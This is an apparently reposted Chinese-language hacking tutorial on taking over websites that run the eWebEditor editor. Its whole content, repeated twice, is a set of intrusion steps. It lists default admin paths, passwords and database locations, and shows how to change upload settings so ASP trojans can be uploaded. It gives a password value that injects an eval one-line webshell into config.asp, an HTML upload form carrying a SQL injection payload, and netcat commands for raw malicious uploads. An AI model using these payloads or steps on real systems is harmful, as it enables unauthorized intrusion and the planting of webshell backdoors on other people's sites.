腳本入侵 入侵ewebeditor編輯器一些技巧
發(fā)布日期:2022-01-31 10:47 | 文章來源:源碼中國
eWebEditor編輯器
建議最好檢測下admin_style.asp文件是否可以直接訪問 直接到樣式管理
默認(rèn)后臺地址:/ewebeditor/admin_login.asp
使用默認(rèn)密碼:admin/admin 或 admin/admin888
不行就默認(rèn)數(shù)據(jù)庫路徑 eWebEditor/db/ewebeditor.mdb 或eWebEditor/db/%23ewebeditor.mdb
拿webshell方法第一種方法
登陸后臺點擊“樣式管理”-選擇新增樣式
只寫這幾樣 大家照做就行了
樣式名稱:chouxiaozi 隨便寫
路徑模式:選擇絕對路徑
圖片類型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
這樣我們可以上各種格式的木馬 我們只要把木馬改成添加的這些格式就可以了
上傳路徑:寫上這個admin/ 或?qū)? 免的別人把UploadFile/目錄刪了 我們找不到馬
內(nèi)容路徑:空 記得
圖片限制:寫上1000 免的上不了我們的asp木馬
然后我們就可以提交了
就可以看到樣式增加成功!
然后我們按-返回樣式管理 找到剛才添加的樣式名稱 然后按工具欄 在按新增工具欄
然后按-按鈕設(shè)置 在可選按鈕 選擇插入圖片然后按》 -然后保存設(shè)置
在返回樣式管理-找到剛才添加的樣式名稱-按預(yù)覽-這里回看到一個正方形的東西 我們點擊
然后上傳我們的剛才添加的格式的木馬
拿webshell方法第二種方法
登陸后臺,點擊修改密碼---新密碼設(shè)置為 1":eval request("choxiaozi")’
設(shè)置成功后,訪問asp/config.asp文件即可,一句話木馬被寫入到這個文件里面了.
然后用一句話客戶端連接
拿webshell方法第三種方法
ewebeditor不登陸也獲得webshell 這就不多說了 大家去百度搜索 ewebeditor不登陸也獲得webshell
下載教程看
拿webshell方法第四種方法
利用ewebeditor asp版 2.1.6 上傳漏洞利用程序
首先先看eWebEditor/upload.asp 上傳地址存在不
存在的話就把下面的代碼保存為
H1>ewebeditor asp版 2.1.6 上傳漏洞利用程序----</H1><br><br>
<form action="這里寫上傳地址?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
改上傳地址保存為chouxiaozi.HTM文件,打開可以直接上傳CER文件,測試成功.上傳后地址看源文件
就可以看到我們上傳的路徑和地址
拿webshell方法第五種方法
ewebeditor 雞肋的上傳漏洞
首先先看下ewebeditor/asp/upload.asp 上傳地址存在不
存在就
把下面的代碼
<form action="這里寫上傳地址?action=savetype=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
然后保存為chouxiaozi.html
打開可以直接上傳gif文件,測試成功.上傳后地址看源文件
就可以看到我們上傳的路徑和地址
拿webshell方法第六種方法
利用eWebEditor/upload.asp
抓包和nc上傳
抓包cookies 參數(shù) 和文件的數(shù)據(jù) 然后保存成文本 比如chouxiaozi.txt
然后用編譯C32asm 或等等編譯工具 修改
然后用nc.exe 提交 命令nc -vv site 80<chouxiaozi.txt
不懂抓包和nc上傳 百度搜索相關(guān)教程
回頭說下有時候進了個網(wǎng)站后臺-看到了eWebEditor編輯器 但是找不到eWebEditor目錄地址
我們來點鼠標(biāo)右鍵-查看源代碼,找到仔細找eWebEditor的路徑。
建議最好檢測下admin_style.asp文件是否可以直接訪問 直接到樣式管理
默認(rèn)后臺地址:/ewebeditor/admin_login.asp
使用默認(rèn)密碼:admin/admin 或 admin/admin888
不行就默認(rèn)數(shù)據(jù)庫路徑 eWebEditor/db/ewebeditor.mdb 或eWebEditor/db/%23ewebeditor.mdb
拿webshell方法第一種方法
登陸后臺點擊“樣式管理”-選擇新增樣式
只寫這幾樣 大家照做就行了
樣式名稱:chouxiaozi 隨便寫
路徑模式:選擇絕對路徑
圖片類型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
這樣我們可以上各種格式的木馬 我們只要把木馬改成添加的這些格式就可以了
上傳路徑:寫上這個admin/ 或?qū)? 免的別人把UploadFile/目錄刪了 我們找不到馬
內(nèi)容路徑:空 記得
圖片限制:寫上1000 免的上不了我們的asp木馬
然后我們就可以提交了
就可以看到樣式增加成功!
然后我們按-返回樣式管理 找到剛才添加的樣式名稱 然后按工具欄 在按新增工具欄
然后按-按鈕設(shè)置 在可選按鈕 選擇插入圖片然后按》 -然后保存設(shè)置
在返回樣式管理-找到剛才添加的樣式名稱-按預(yù)覽-這里回看到一個正方形的東西 我們點擊
然后上傳我們的剛才添加的格式的木馬
拿webshell方法第二種方法
登陸后臺,點擊修改密碼---新密碼設(shè)置為 1":eval request("choxiaozi")’
設(shè)置成功后,訪問asp/config.asp文件即可,一句話木馬被寫入到這個文件里面了.
然后用一句話客戶端連接
拿webshell方法第三種方法
ewebeditor不登陸也獲得webshell 這就不多說了 大家去百度搜索 ewebeditor不登陸也獲得webshell
下載教程看
拿webshell方法第四種方法
利用ewebeditor asp版 2.1.6 上傳漏洞利用程序
首先先看eWebEditor/upload.asp 上傳地址存在不
存在的話就把下面的代碼保存為
H1>ewebeditor asp版 2.1.6 上傳漏洞利用程序----</H1><br><br>
<form action="這里寫上傳地址?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
改上傳地址保存為chouxiaozi.HTM文件,打開可以直接上傳CER文件,測試成功.上傳后地址看源文件
就可以看到我們上傳的路徑和地址
拿webshell方法第五種方法
ewebeditor 雞肋的上傳漏洞
首先先看下ewebeditor/asp/upload.asp 上傳地址存在不
存在就
把下面的代碼
<form action="這里寫上傳地址?action=savetype=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
然后保存為chouxiaozi.html
打開可以直接上傳gif文件,測試成功.上傳后地址看源文件
就可以看到我們上傳的路徑和地址
拿webshell方法第六種方法
利用eWebEditor/upload.asp
抓包和nc上傳
抓包cookies 參數(shù) 和文件的數(shù)據(jù) 然后保存成文本 比如chouxiaozi.txt
然后用編譯C32asm 或等等編譯工具 修改
然后用nc.exe 提交 命令nc -vv site 80<chouxiaozi.txt
不懂抓包和nc上傳 百度搜索相關(guān)教程
回頭說下有時候進了個網(wǎng)站后臺-看到了eWebEditor編輯器 但是找不到eWebEditor目錄地址
我們來點鼠標(biāo)右鍵-查看源代碼,找到仔細找eWebEditor的路徑。
版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。
相關(guān)文章